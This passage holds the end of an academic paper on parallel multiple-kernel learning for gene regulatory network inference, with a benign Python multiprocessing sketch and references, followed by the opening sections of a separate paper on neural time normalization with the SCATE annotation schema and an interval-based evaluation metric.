it lacks the ability to learn from heterogeneous genomic datasets that can provide essential and complementary information for GRN inference. Another limitation is the sequential execution of the TF-specific classification problems, which incurs a huge cost in terms of execution time as we move from E. coli genomes to the more complex and larger genomes of mice and humans. Therefore, to facilitate very large-scale GRN inference using a supervised learning approach, we use the concept of decomposing the initial problem of learning a GRN into many subproblems, where each subproblem aims to infer a GRN for a specific TF. Our algorithm distributes all such learning problems to different processors on a multi-processor hardware platform and dispatches them for simultaneous execution, thereby reducing the execution time of the inference process substantially. The results from each execution are written to a shared queue object; once all the child processes complete their execution, the queue object is iterated to build a single output matrix for genome-scale GRN inference. We also assess the inference potential of our MKL-based parallel GRN inference approach by computing the essential evaluation metrics for machine learning based approaches. A survey of the scientific literature on GRN inference methods shows that the results obtained by our approach are comparable to other state-of-the-art methods in this domain, and in some cases better than inference methods that employ only gene expression data (e.g., CLR, ARACNE, SIRENE, etc.). A drawback of our approach is that only TFs with known targets can be used to train the inference model. Also, the performance of the algorithm tends to decrease if the model training is carried out using TFs with few known targets, leading to a bias in favor of TFs with many known neighbors (i.e., hubs), and the model is less likely to predict new associations for TFs with very few neighbors. Besides, we are not able to identify new TFs among the newly learned interactions, nor can the model predict whether a given gene is upregulated or downregulated by a particular TF. Therefore, additional work is needed to improve the efficiency of the parallel algorithm and the inference potential of MKL-GRNI. In our current implementation, we integrate only two datasets for GRNI, leaving scope to use more omics sources that can be integrated for improved performance of the inference model. Also, the MKL framework provides a mechanism to weigh the contribution of individual datasets, which can be used to select informative datasets for integration. Further, we do not identify TFs from the predicted target genes; this can be considered in a future extension of this work. Besides, novel techniques to choose negative examples for training our parallel MKL-GRNI model can be incorporated to decrease the number of false positives and improve the overall precision/recall scores for genomes of higher organisms.
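For illustration, the queue-based decomposition described above can be sketched with Python's multiprocessing module as follows; `train_and_score` is a placeholder for the per-TF MKL/SVM training step and, like the other names here, is not taken from the released code.

```python
import multiprocessing as mp
import numpy as np

def train_and_score(K, y):
    # Placeholder for the per-TF MKL/SVM step; returns one score per gene.
    return np.random.rand(K.shape[0])

def infer_tf(tf_index, K, labels, out_queue):
    """Train one TF-specific classifier and push its predicted target scores to the queue."""
    scores = train_and_score(K, labels[:, tf_index])
    out_queue.put((tf_index, scores))

def parallel_grn(K, labels):
    """Distribute per-TF subproblems across processes and assemble the output matrix."""
    queue = mp.Queue()
    procs = [mp.Process(target=infer_tf, args=(t, K, labels, queue))
             for t in range(labels.shape[1])]
    for p in procs:
        p.start()
    results = [queue.get() for _ in procs]   # drain the queue before joining
    for p in procs:
        p.join()
    output = np.zeros((K.shape[0], labels.shape[1]))
    for tf_index, scores in results:
        output[:, tf_index] = scores          # one column per TF-specific GRN
    return output

# On platforms that spawn processes, call parallel_grn() under
# an `if __name__ == "__main__":` guard.
```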
ADDITIONAL INFORMATION AND DECLARATIONS

Funding
Nisar Wani is supported by a Teacher Fellowship of the University Grants Commission, Ministry of Human Resources Development, Govt. of India vide letter No. F.B No. 27-(TF-45)/2015 under the Faculty Development Programme. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

Grant Disclosures
The following grant information was disclosed by the authors:
University Grants Commission, Ministry of Human Resources Development, Govt. of India: F.B No. 27-(TF-45)/2015.

Competing Interests
The authors declare that they have no competing interests.

Author Contributions
- Nisar Wani conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- Khalid Raza conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.

Data Availability
The following information was supplied regarding data availability:
The code is available at GitHub: https://github.com/waninisar/MKL-GRNI.

REFERENCES
Albert R. 2007. Network inference, analysis, and modeling in systems biology. Plant Cell 19(11):3327–3338 DOI 10.1105/tpc.107.054700.
Alioscha-Perez M, Oveneke MC, Sahli H. 2019. Svrg-mkl: a fast and scalable multiple kernel learning solution for features combination in multi-class classification problems. IEEE Transactions on Neural Networks and Learning Systems 31(5):1710–1723 DOI 10.1109/TNNLS.2019.2922123.
Ben-Hur A, Noble WS. 2005. Kernel methods for predicting protein-protein interactions. Bioinformatics 21(Suppl. 1):i38–i46 DOI 10.1093/bioinformatics/bti1016.
Butte AJ, Kohane IS. 1999. Mutual information relevance networks: functional genomic clustering using pairwise entropy measurements. In: Biocomputing 2000. Singapore: World Scientific, 418–429.
Chen Z-Y, Fan Z-P. 2014. Parallel multiple kernel learning: a hybrid alternating direction method of multipliers. Knowledge and Information Systems 40(3):673–696 DOI 10.1007/s10115-013-0655-5.
Cichonska A, Pahikkala T, Szedmak S, Julkunen H, Airola A, Heinonen M, Aittokallio T, Rousu J. 2018. Learning with multiple pairwise kernels for drug bioactivity prediction. Bioinformatics 34(13):i509–i518 DOI 10.1093/bioinformatics/bty277.
ENCODE Project Consortium. 2004. The ENCODE (ENCyclopedia Of DNA Elements) Project. Science 306(5696):636–640 DOI 10.1126/science.1105136.
Faith JJ, Hayete B, Thaden JT, Mogno I, Wierzbowski J, Cottarel G, Kasif S, Collins JJ, Gardner TS. 2007. Large-scale mapping and validation of Escherichia coli transcriptional regulation from a compendium of expression profiles. PLOS Biology 5(1):e8 DOI 10.1371/journal.pbio.0050008.
Han H, Shim H, Shin D, Shim JE, Ko Y, Shin J, Kim H, Cho A, Kim E, Lee T, Kim H, Kim K, Yang S, Bae D, Yun A, Kim S, Kim CY, Cho HJ, Kang B, Shin S, Lee I. 2015. TRRUST: a reference database of human transcriptional regulatory interactions. Scientific Reports 5(1):11432 DOI 10.1038/srep11432.
Hecker M, Lambeck S, Toepfer S, Van Someren E, Guthke R. 2009. Gene regulatory network inference: data integration in dynamic models: a review. Biosystems 96(1):86–103 DOI 10.1016/j.biosystems.2008.12.004.
Huynh-Thu VA, Irrthum A, Wehenkel L, Geurts P. 2010. Inferring regulatory networks from expression data using tree-based methods. PLOS ONE 5(9):e12776 DOI 10.1371/journal.pone.0012776.
Jiang C, Xuan Z, Zhao F, Zhang MQ. 2007. Tred: a transcriptional regulatory element database, new entries and other development.
Nucleic Acids Research 35(Suppl. 1):D137–D140 DOI 10.1093/nar/gkl1041. Kondor RI, Lafferty J. 2002. Diffusion kernels on graphs and other discrete structures. Proceedings of the 19th International Conference on Machine Learning 2002:315–322. Lanckriet GR, De Bie T, Cristianini N, Jordan MI, Noble WS. 2003. Kernel-based data fusion and its application to protein function prediction in yeast. In: Biocomputing 2004. Singapore: World Scientific, 300–311. Lanckriet GR, De Bie T, Cristianini N, Jordan MI, Noble WS. 2004. A statistical framework for genomic data fusion. Bioinformatics 20(16):2626–2635 DOI 10.1093/bioinformatics/bth294. Lee TI, Rinaldi NJ, Robert F, Odom DT, Bar-Joseph Z, Gerber GK, Hannett NM, Harbison CT, Thompson CM, Simon I, Zeitlinger J, Jennings EG, Murray HL, Gordon DB, Ren B, Wyrick JJ, Tagne J-B, Volkert TL, Fraenkel E, Gifford DK, Young RA. 2002. Transcriptional regulatory networks in saccharomyces cerevisiae. Science 298(5594):799–804 DOI 10.1126/science.1075090. Marbach D, Costello JC, Küffner R, Vega NM, Prill RJ, Camacho DM, Allison KR, Consortium D, Kellis M, Collins JJ, Stolovitzky G. 2012. Wisdom of crowds for robust gene network inference. Nature Methods 9(8):796. Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 18/20 http://dx.doi.org/10.1109/TNNLS.2019.2922123 http://dx.doi.org/10.1093/bioinformatics/bti1016 http://dx.doi.org/10.1007/s10115-013-0655-5 http://dx.doi.org/10.1093/bioinformatics/bty277 http://dx.doi.org/10.1126/science.1105136 http://dx.doi.org/10.1371/journal.pbio.0050008 http://dx.doi.org/10.1038/srep11432 http://dx.doi.org/10.1016/j.biosystems.2008.12.004 http://dx.doi.org/10.1371/journal.pone.0012776 http://dx.doi.org/10.1093/nar/gkl1041 http://dx.doi.org/10.1093/bioinformatics/bth294 http://dx.doi.org/10.1126/science.1075090 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Margolin AA, Nemenman I, Basso K, Wiggins C, Stolovitzky G, Dalla Favera R, Califano A. 2006. Aracne: an algorithm for the reconstruction of gene regulatory networks in a mammalian cellular context. BMC Bioinformatics 7(1):S7 DOI 10.1186/1471-2105-7-S1-S7. Mordelet F, Vert J-P. 2008. SIRENE: supervised inference of regulatory networks. Bioinformatics 24(16):i76–i82 DOI 10.1093/bioinformatics/btn273. Nascimento AC, Prudêncio RB, Costa IG. 2016. A multiple kernel learning algorithm for drug- target interaction prediction. BMC Bioinformatics 17(1):46 DOI 10.1186/s12859-016-0890-3. Pavlidis P, Weston J, Cai J, Noble WS. 2002. Learning gene functional classifications from multiple data types. Journal of Computational Biology 9(2):401–411 DOI 10.1089/10665270252935539. Petralia F, Wang P, Yang J, Tu Z. 2015. Integrative random forest for gene regulatory network inference. Bioinformatics 31(12):i197–i205 DOI 10.1093/bioinformatics/btv268. Raza K, Alam M. 2016. Recurrent neural network based hybrid model for reconstructing gene regulatory network. Computational Biology and Chemistry 64:322–334 DOI 10.1016/j.compbiolchem.2016.08.002. Remli MA, Mohamad MS, Deris S, Samah AA, Omatu S, Corchado JM. 2019. Cooperative enhanced scatter search with opposition-based learning schemes for parameter estimation in high dimensional kinetic models of biological systems. Expert Systems with Applications 116:131–146 DOI 10.1016/j.eswa.2018.09.020. Scholkopf B, Smola AJ. 2001. Learning with kernels: support vector machines, regularization, optimization, and beyond. Cambridge: MIT Press. Seoane JA, Day IN, Gaunt TR, Campbell C. 2013. 
A pathway-based data integration framework for prediction of disease progression. Bioinformatics 30(6):838–845 DOI 10.1093/bioinformatics/btt610. Shawe-Taylor J, Cristianini N. 2004. Kernel methods for pattern analysis. Cambridge: Cambridge University Press. Sonnenburg S, Henschel S, Widmer C, Behr J, Zien A, Bona Fd, Binder A, Gehl C, Franc V. 2010. The shogun machine learning toolbox. Journal of Machine Learning Research 11:1799–1802. Sonnenburg S, Rätsch G, Schäfer C, Schölkopf B. 2006. Large scale multiple kernel learning. Journal of Machine Learning Research 7:1531–1565. Speicher NK, Pfeifer N. 2015. Integrating different data types by regularized unsupervised multiple kernel learning with application to cancer subtype discovery. Bioinformatics 31(12):i268–i275 DOI 10.1093/bioinformatics/btv244. Szklarczyk D, Franceschini A, Kuhn M, Simonovic M, Roth A, Minguez P, Doerks T, Stark M, Muller J, Bork P, Jensen LJ, Mering C. 2011. The STRING database in 2011: functional interaction networks of proteins, globally integrated and scored. Nucleic Acids Research 39(Suppl. 1):D561–D568 DOI 10.1093/nar/gkq973. Tomczak K, Czerwińska P, Wiznerowicz M. 2015. The cancer genome atlas (tcga): an immeasurable source of knowledge. Contemporary Oncology 19(1A):A68. Van Laarhoven T, Nabuurs SB, Marchiori E. 2011. Gaussian interaction profile kernels for predicting drug-target interaction. Bioinformatics 27(21):3036–3043 DOI 10.1093/bioinformatics/btr500. Wani N, Raza K. 2018. Multiple kernel-learning approach for medical image analysis. In: Soft Computing Based Medical Image Analysis. Amsterdam: Elsevier, 31–47. Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 19/20 http://dx.doi.org/10.1186/1471-2105-7-S1-S7 http://dx.doi.org/10.1093/bioinformatics/btn273 http://dx.doi.org/10.1186/s12859-016-0890-3 http://dx.doi.org/10.1089/10665270252935539 http://dx.doi.org/10.1093/bioinformatics/btv268 http://dx.doi.org/10.1016/j.compbiolchem.2016.08.002 http://dx.doi.org/10.1016/j.eswa.2018.09.020 http://dx.doi.org/10.1093/bioinformatics/btt610 http://dx.doi.org/10.1093/bioinformatics/btv244 http://dx.doi.org/10.1093/nar/gkq973 http://dx.doi.org/10.1093/bioinformatics/btr500 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Wani N, Raza K. 2019a. Integrative approaches to reconstruct regulatory networks from multi-omics data: a review of state-of-the-art methods. Computational Biology and Chemistry 83:107120 DOI 10.1016/j.compbiolchem.2019.107120. Wani N, Raza K. 2019b. iMTF-GRN: integrative matrix tri-factorization for inference of gene regulatory networks. IEEE Access 7:126154–126163 DOI 10.1109/ACCESS.2019.2936794. Yamanishi Y, Vert J-P, Kanehisa M. 2004. Protein network inference from multiple genomic data: a supervised approach. Bioinformatics 20(Suppl. 1):i363–i370 DOI 10.1093/bioinformatics/bth910. Yan S, Xu D, Zhang B, Zhang H-J, Yang Q, Lin S. 2007. Graph embedding and extensions: a general framework for dimensionality reduction. IEEE Transactions on Pattern Analysis and Machine Intelligence 29(1):40–51 DOI 10.1109/TPAMI.2007.250598. Wani and Raza (2021), PeerJ Comput. 
work_2qq6wxmizbfornkrysxkp6vpqu ---- From Characters to Time Intervals: New Paradigms for Evaluation and Neural Parsing of Time Normalizations Egoitz Laparra∗ Dongfang Xu∗ Steven Bethard School of Information University of Arizona Tucson, AZ {laparra,dongfangxu9,bethard}@email.arizona.edu Abstract This paper presents the first model for time normalization trained on the SCATE corpus. In the SCATE schema, time expressions are annotated as a semantic composition of time entities. This novel schema favors machine learning approaches, as it can be viewed as a semantic parsing task. In this work, we propose a character-level multi-output neural network that outperforms previous state-of-the-art built on the TimeML schema. To compare predictions of systems that follow both SCATE and TimeML, we present a new scoring metric for time intervals. We also apply this new metric to carry out a comparative analysis of the annotations of both schemes in the same corpus. 1 Introduction Time normalization is the task of translating natural language expressions of time to computer-readable forms. For example, the expression three days ago could be normalized to the formal representation 2017-08-28 in the ISO-8601 standard. As time normalization allows entities and events to be placed along a timeline, it is a crucial step for many information extraction tasks.
Since the first shared tasks on time normalization (Verhagen et al., 2007), interest in the problem and the variety of applications have been growing. For example, Lin et al. (2015) use normal- ized timestamps from electronic medical records to contribute to patient monitoring and detect potential causes of disease. Vossen et al. (2016) identify multi- lingual occurrences of the same events in the news ∗These two authors contributed equally. by, among other steps, normalizing time-expressions in different languages with the same ISO standard. Fischer and Strötgen (2015) extract and normalize time-expressions from a large corpus of German fic- tion as the starting point of a deep study on trends and patterns of the use of dates in literature. A key consideration for time normalization sys- tems is what formal representation the time expres- sions should be normalized to. The most popular scheme for annotating normalized time expressions is ISO-TimeML (Pustejovsky et al., 2003a; Puste- jovsky et al., 2010), but it is unable to represent several important types of time expressions (e.g., a bounded set of intervals, like Saturdays since March 6) and it is not easily amenable to machine learning (the rule-based HeidelTime (Strötgen et al., 2013) still yields state-of-the-art performance). Bethard and Parker (2016) proposed an alternate scheme, Se- mantically Compositional Annotation of Time Ex- pressions (SCATE), in which times are annotated as compositional time entities (Figure 1), and suggested that this should be more amenable to machine learn- ing. However, while they constructed an annotated corpus, they did not train any automatic models on it. We present the first machine-learning models trained on the SCATE corpus of time normalizations. We make several contributions in the process: • We introduce a new evaluation metric for time normalization that can compare normalized times from different annotation schemes by mea- suring overlap of intervals on the timeline. • We use the new metric to compare SCATE and TimeML annotations on the same corpus, and confirm that SCATE covers a wider variety of 343 Transactions of the Association for Computational Linguistics, vol. 6, pp. 343–356, 2018. Action Editor: Mona Diab. Submission batch: 10/2017; Revision batch: 1/2018; Published 5/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. THIS INTERVAL REPEATING-INTERVALS DAY-OF-WEEK TYPE=SATURDAY Saturdays BETWEEN START-INTERVAL END-INTERVAL=DOC-TIME since LAST INTERVAL=DOC-TIME REPEATING-INTERVAL MONTH-OF-YEAR TYPE=MARCH SUB-INTERVAL March DAY-OF-MONTH VALUE=6 6 Figure 1: Annotation of the expression Saturdays since March 6 following the SCATE schema. time expressions. • We develop a recurrent neural network for learn- ing SCATE-style time normalization, and show that our model outperforms the state-of-the-art HeidelTime (Strötgen et al., 2013). • We show that our character-based multi-output neural network architecture outperforms both word-based and single-output models. 2 Background ISO-TimeML (Pustejovsky et al., 2003a; Pustejovsky et al., 2010) is the most popular scheme for annotat- ing time expressions. It annotates time expressions as phrases, and assigns an ISO 8601 normalization (e.g., 1990-08-15T13:37 or PT24H) as the VALUE at- tribute of the normalized form. 
ISO-TimeML is used in several corpora, including the TimeBank (Puste- jovsky et al., 2003b), WikiWars (Mazur and Dale, 2010), TimeN (Llorens et al., 2012), and the Temp- Eval shared tasks (Verhagen et al., 2007; Verhagen et al., 2010; UzZaman et al., 2013). However, the ISO-TimeML schema has a few drawbacks. First, times that align to more than a single calendar unit (day, week, month, etc.), such as Saturdays since March 6 (where multiple Satur- days are involved), cannot be described in the ISO 8601 format since they do not correspond to any pre- fix of YYYY-MM-DDTHH:MM:SS. Second, each time expression receives a single VALUE, regardless of the word span, the compositional semantics of the expression are not represented. For example, in the expressions since last week and since March 6, the semantics of since are identical – find the inter- val between the anchor time (last week or March 6) and now. But ISO-TimeML would have to annotate these two phrases independently, with no way to in- dicate the shared portion of their semantics. These drawbacks of ISO-TimeML, especially the lack of compositionality, make the development of machine learning models difficult. Thus, most prior work has taken a rule-based approach, looking up each token of a time expression in a normalization lexicon and then mapping this sequence of lexical entries to the normalized form (Strötgen and Gertz, 2013; Bethard, 2013; Lee et al., 2014; Strötgen and Gertz, 2015). As an alternative to TimeML, and inspired by pre- vious works, Schilder (2004) and Han and Lavie (2004), Bethard and Parker (2016) proposed Seman- tically Compositional Annotation of Time Expres- sions (SCATE). In the SCATE schema, each time expression is annotated in terms of compositional time entity over intervals on the timeline. An ex- ample is shown in Figure 1, with every annotation corresponding to a formally defined time entity. For instance, the annotation on top of since corresponds to a BETWEEN operator that identifies an interval starting at the most recent March 6 and ending at the document creation time (DCT). The BETWEEN operator is formally defined as: BETWEEN([t1, t2): INTERVAL, [t3, t4): INTERVAL): INTERVAL = [t2, t3). The SCATE schema can represent a wide variety of time expressions, and provides a formal definition of the semantics of each annotation. Unlike TimeML, SCATE uses a graph structure to capture composi- tional semantics and can represent time expressions that are not expressed with contiguous phrases. The schema also has the advantage that it can be viewed as a semantic parsing task and, consequently, is more 344 suitable for machine-learning approaches. However, Bethard and Parker (2016) present only a corpus; they do not present any models for semantic parsing. 3 An interval-based evaluation metric for normalized times Before attempting to construct machine-learned mod- els from the SCATE corpus, we were interested in evaluating Bethard and Parker (2016)’s claim that the SCATE schema is able to represent a wider vari- ety of time expressions than TimeML. To do so, we propose a new evaluation metric to compare time nor- malizations annotated in both the ISO 8601 format of TimeML and the time entity format of SCATE. This new evaluation interprets normalized annotations as intervals along the timeline and measures the overlap of the intervals. TimeML TIMEX3 (time expression) annotations are converted to intervals following ISO 8601 se- mantics of their VALUE attribute. 
So, for example, 1989-03-05 is converted to the interval [1989-03- 05T00:00:00, 1989-03-06T00:00:00), that is, the 24- hour period starting at the first second of the day on 1989-03-05 and ending just before the first second of the day on 1989-03-06. SCATE annotations are con- verted to intervals following the formal semantics of each entity, using the library provided by Bethard and Parker (2016). So, for example, Next(Year(1985), SimplePeriod(YEARS, 3)), the 3 years following 1985, is converted to [1986-01-01T00:00, 1989-01- 01T00:00). Note that there may be more than one interval associated with a single annotation, as in the Saturdays since March 6 example. Once all anno- tations have been converted into intervals along the timeline, we can measure how much the intervals of different annotations overlap. Given two sets of intervals, we define the interval precision, Pint, as the total length of the intervals in common between the two sets, divided by the total length of the intervals in the first set. Interval recall, Rint is defined as the total length of the intervals in common between the two sets, divided by the total length of the intervals in the second set. Formally: IS ⋂ IH = {i∩ j : i ∈ IS ∧ j ∈ IH} Pint(IS, IH) = ∑ i∈COMPACT(IS ⋂ IH) |i| ∑ i∈IS |i| Rint(IS, IH) = ∑ i∈COMPACT(IS ⋂ IH) |i| ∑ i∈∪IH |i| where IS and IH are sets of intervals, i∩j is possibly the empty interval in common between the intervals i and j, |i| is the length of the interval i, and COMPACT takes a set of intervals and merges any overlapping intervals. Given two sets of annotations (e.g., one each from two time normalization systems), we define the over- all precision, P , as the average of interval precisions where each annotation from the first set is paired with all annotations that textually overlap it in the second set. Overall recall is defined as the average of interval recalls where each annotation from the second set is paired with all annotations that textually overlap it in the first set. Formally: OIa(B) = ⋃ b∈B:OVERLAPS(a,b) INTERVALS(b) P(S, H) = 1 |S| ∑ s∈S Pint(INTERVALS(s), OIs(H)) R(S, H) = 1 |H| ∑ h∈H Rint(INTERVALS(h), OIh(S)) where S and H are sets of annotations, INTERVALS(x) gives the time intervals associ- ated with the annotation x, and OVERLAPS(a, b) decide whether the annotations a and b share at least one character of text in common. It is important to note that these metrics can be applied only to time expressions that yield bounded intervals. Time expressions that refer to intervals with undefined boundaries are out of the scope, like in “it takes just a minute” or “I work every Saturday”. 4 Data analysis 4.1 TimeML vs. SCATE Both TimeML and SCATE annotations are available on a subset of the TempEval 2013 corpus (UzZaman et al., 2013) that contains a collection of news articles from different sources, such as Wall Street Journal, 345 AQUAINT TimeBank Test Documents 10 68 20 Sentences 251 1429 339 TimeML timex3 61 499 158 SCATE entities 333 1810 461 SCATE time exp. 114 715 209 SCATE bounded 67 403 93 Table 1: Number of documents, TimeML TIMEX3 an- notations and SCATE annotations for the subset of the TempEval 2013 corpus annotated with both schemas. AQUAINT TimeBank P R F1 P R F1 Body text 92.2 92.2 92.2 82.4 83.0 82.7 All text 92.2 67.1 77.7 82.4 71.2 76.4 Table 2: Comparison of TimeML and SCATE annotations. New York Times, Cable News Network, and Voices of America. Table 1 shows the statistics of the data. 
Documents from the AQUAINT and TimeBank form the training and development dataset. The SCATE corpus contains 2604 time entities (individual com- ponents of a time expression, such as every, month, last, Monday, etc.) annotated in the train+dev set (i.e. AQUAINT+TimeBank). These entities compose a total of 1038 time expressions (every month, last Monday, etc.) of which 580 yield bounded intervals, i.e. intervals with a specified start and ending (last Monday is bounded, while every month is not). We apply the interval-based evaluation metric in- troduced in Section 3 to the AQUAINT and Time- Bank datasets, treating the TimeML annotations as the system (S) annotator and the SCATE annotations as the human (H) annotator. Table 2 shows that the SCATE annotations cover different time intervals than the TimeML annotations. In the first row, we see that TimeML has a recall of only 92% of the time in- tervals identified by SCATE in the AQUAINT corpus and of only 83% in the TimeBank corpus. We manu- ally analyzed all places where TimeML and SCATE annotations differed and found that the SCATE inter- pretation was always the correct one. For example, a common case where TimeML and SCATE annotations overlap, but are not identical, is time expressions preceded by a preposition like “since”. The TimeML annotation for “Since 1985” (with a DCT of 1998-03-01T14:11) only covers the year, “1985”, resulting in the time interval [1985- 01-01T00:00,1986-01-01T00:00). The SCATE an- notation represents the full expression and, conse- quently, produces the correct time interval [1986-01- 01T00:00,1998-03-01T14:11). Another common case of disagreement is where TimeML failed to compose all pieces of a complex expression. The TimeML annotation for “10:35 a.m. (0735 GMT) Friday” annotates two separate inter- vals, the time and the day (and ignores “0735 GMT” entirely). The SCATE annotation recognizes this as a description of a single time interval, [1998-08- 07T10:35, 1998-08-07T10:36). TimeML and SCATE annotations also differ in how references to particular past periods are inter- preted. For example, TimeML assumes that “last year” and “a year ago” have identical semantics, re- ferring to the most recent calendar year, e.g., if the DCT is 1998-03-04, then they both refer to the inter- val [1997-01-01T00:00,1998-01-01T00:00). SCATE has the same semantics for “last year”, but recog- nizes that “a year ago” has different semantics: a period centered at one year prior to the DCT. Under SCATE, “a year ago” refers to the interval [1996-09- 03T00:00,1997-09-03T00:00). Beyond these differences in interpretation, we also observed that, while the SCATE corpus annotates time expressions anywhere in the document (includ- ing in metadata), the TimeBank TIMEX3 annotations are restricted to the main text of the documents. The second row of Table 2 shows the evaluation when comparing overall text in the document, not just the body text. Unsurprisingly, TimeML has a lower re- call of the time intervals from the SCATE annotations under this evaluation. 4.2 Types of SCATE annotations Studying the training and development portion of the dataset, we noticed that the SCATE annotations can be usefully divided into three categories: non- operators, explicit operators, and implicit operators. We define non-operators as NUMBERs, PERIODs (e.g., three months), explicit intervals (e.g., YEARs like 1989), and repeating intervals (DAY-OF-WEEKs like Friday, MONTH-OF-YEARs like January, etc.). 
Non-operators are basically atomic; they can be in- 346 Non-Op Exp-Op Imp-Op Total 1497 305 219 2021 74% 15% 11% 100% Table 3: Distribution of time entity annotations in AQUAINT+TimeBank. terpreted without having to refer to other annotations. Operators are not atomic; they can only be interpreted with respect to other annotations they link to. For example, the THIS operator in Figure 1 can only be interpreted by first interpreting the DAY-OF-WEEK non-operator and the BETWEEN operator that it links to. We split operators into two types: explicit and implicit. We define an operator as explicit if it does not overlap with any other annotation. This occurs, for example, when the time connective since evokes the BETWEEN operator in Figure 1. An operator is considered to be implicit if it overlaps with an- other annotation. This occurs, for example, with the LAST operator in Figure 1, where March implies last March, but there is no explicit signal in the text, and it must be inferred from context. We study how these annotation groups distribute in the AQUAINT and TimeBank documents. Table 3 shows that non-operators are much more frequent than operators (both explicit and implicit). 5 Models We decompose the normalization of time expressions into two subtasks: a) time entity identification which detects the spans of characters that belong to each time expression and labels them with their corre- sponding time entity; and b) time entity composition that links relevant entities together while respecting the entity type constraints imposed by the SCATE schema. These two tasks are run sequentially using the output of the former as input to the latter. Once identification and composition steps are completed we can use the final product, i.e. semantic composi- tional of time entities, to feed the SCATE interpreter1 and encode time intervals. 5.1 Time entity identification Time entity identification is a type of sequence tag- ging task where each piece of a time expression is 1https://github.com/clulab/timenorm assigned a label that identifies the time entity that it evokes. We express such labels using the BIO tagging system, where B stands for the beginning of an annotation, I for the inside, and O for outside any annotation. Differing somewhat from standard sequence tagging tasks, the SCATE schema allows multiple annotations over the same span of text (e.g., “Saturdays” in Figure 1 is both a DAY-OF-WEEK and a THIS), so entity identification models must be able to handle such multi-label classification. 5.1.1 Neural architectures Recurrent neural networks (RNN) are the state- of-the-art on sequence tagging tasks (Lample et al., 2016a; Graves et al., 2013; Plank et al., 2016) thanks to their ability to maintain a memory of the sequence as they read it and make predictions conditioned on long distance features, so we also adopt them here. We introduce three RNN architectures that share a similar internal structure, but differ in how they repre- sent the output. They convert the input into features that feed an embedding layer. The embedded feature vectors are then fed into two stacked bidirectional Gated Recurrent Units (GRUs), and the second GRU followed by an activation function, outputs one BIO tag for each input. We select GRU for our models as they can outperform another popular recurrent unit LSTM (Long Short Term Memory), in terms of pa- rameter updates and convergence in CPU time with the same number of parameters (Chung et al., 2014). 
Our 1-Sigmoid model (Figure 2) approaches the task as a multi-label classification problem, with a set of sigmoids for each output that allow zero or more BIO labels to be predicted simultaneously. This is the standard way of encoding multi-label classification problems for neural networks, but in our experiments, we found that these models perform poorly since they can overproduce labels for each input, e.g., 03 could be labeled with both DAY-OF-MONTH and MONTH- OF-YEAR at the same time. Our 2-Softmax model (Figure 3) splits the out- put space of labels into two sets: non-operators and operators (as defined in Section 4.2). It is very un- likely that any piece of text will be annotated with more than one non-operator or with more than one operator,2 though it is common for text to be anno- 2In the training data, only 4 of 1217 non-operators overlap with another non-operator, and only 6 of 406 operators overlap 347 Input Feature Embed Bi-GRU Bi-GRU Sigmoid Output Non-Operators and Operators M M Lu NNP B-LAST B-MONTH a a Ll NNP I-LAST I-MONTH y y Ll NNP I-LAST I-MONTH Zs ∅ ∅ 2 2 Nd CD B-DAY 5 5 Nd CD I-DAY . . . . . . . . . . . . . . . . . . Figure 2: Architecture of the 1-Sigmoid model. The input is May 25. In SCATE-style annotation, May is a MONTH- OF-YEAR (a non-operator), with an implicit LAST (an operator) over the same span, and 25 is a DAY-OF-MONTH. At the feature layer, M is an uppercase letter (Lu), a and y are lowercase letters (Ll), space is a separator (Zs), and May is a proper noun (NNP). Input Feature Embed Bi-GRU Bi-GRU Softmax Output Non-Operators Operators M M Lu NNP B-MONTH B-LAST a a Ll NNP I-MONTH I-LAST y y Ll NNP I-MONTH I-LAST Zs ∅ O O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Figure 3: Architecture of the 2-Softmax model. The input is May. The SCATE annotations and features are the same as in Figure 2. tated with one non-operator and one operator (see Figure 1). As a result, we can use two softmaxes, one for non-operators and one for operators, and the 2- Softmax model thus can produce 0, 1, or 2 labels per input. We share input and embedding layers, but as- sociate a separate set of stacked Bi-GRUs with each output category, as shown in Figure 3.3 Our 3-Softmax further splits operators into explicit operators and implicit operators (again, as defined with another operator. For example, a NYT said in an editorial on Saturday, April 25, Saturday is labeled as [DAY-OF-WEEK, LAST, INTERSECTION] where the last two labels are operators. 3In preliminary experiments, we tried sharing GRU layers as well, but this generally resulted in worse performance. in Section 4.2). We expect this to help the model since the learning task is very different for these two cases: with explicit operators, the model just has to memorize which phrases evoke which operators, while with implicit operators, the model has to learn to infer an operator from context (verb tense, etc.). We use three softmaxes, one each for non-operators, explicit operators, and implicit operators, and, as with 2-Softmax, we share input and embedding layers, but associate a separate set of stacked Bi-GRUs with each output category. The model looks similar to Figure 3, but with three output groups instead of two. We feed three features as input to the RNNs: Text: The input word itself for the word-by-word 348 model, or a the single input character for the character-by-character model. 
Unicode character categories: The category of each character as defined by the Unicode standard (see http://unicode.org/notes/tn36/). This encodes information like the presence of uppercase (Lu) or lowercase (Ll) letters, punctuation (Po), digits (Nd), etc. For the word-by-word model, we concatenate the character categories of all characters in the word (e.g., May becomes LuLlLl).

Part-of-speech: The part-of-speech as determined by the Stanford POS tagger (Toutanova et al., 2003). We expect this to be useful for, e.g., finding verb tense to help distinguish between implicit LAST and NEXT operators. For the character-by-character model, we repeat the word-level part-of-speech tag for each character in the word, and characters with no part-of-speech (e.g., spaces) get no tag.

5.1.2 Input: words vs. characters

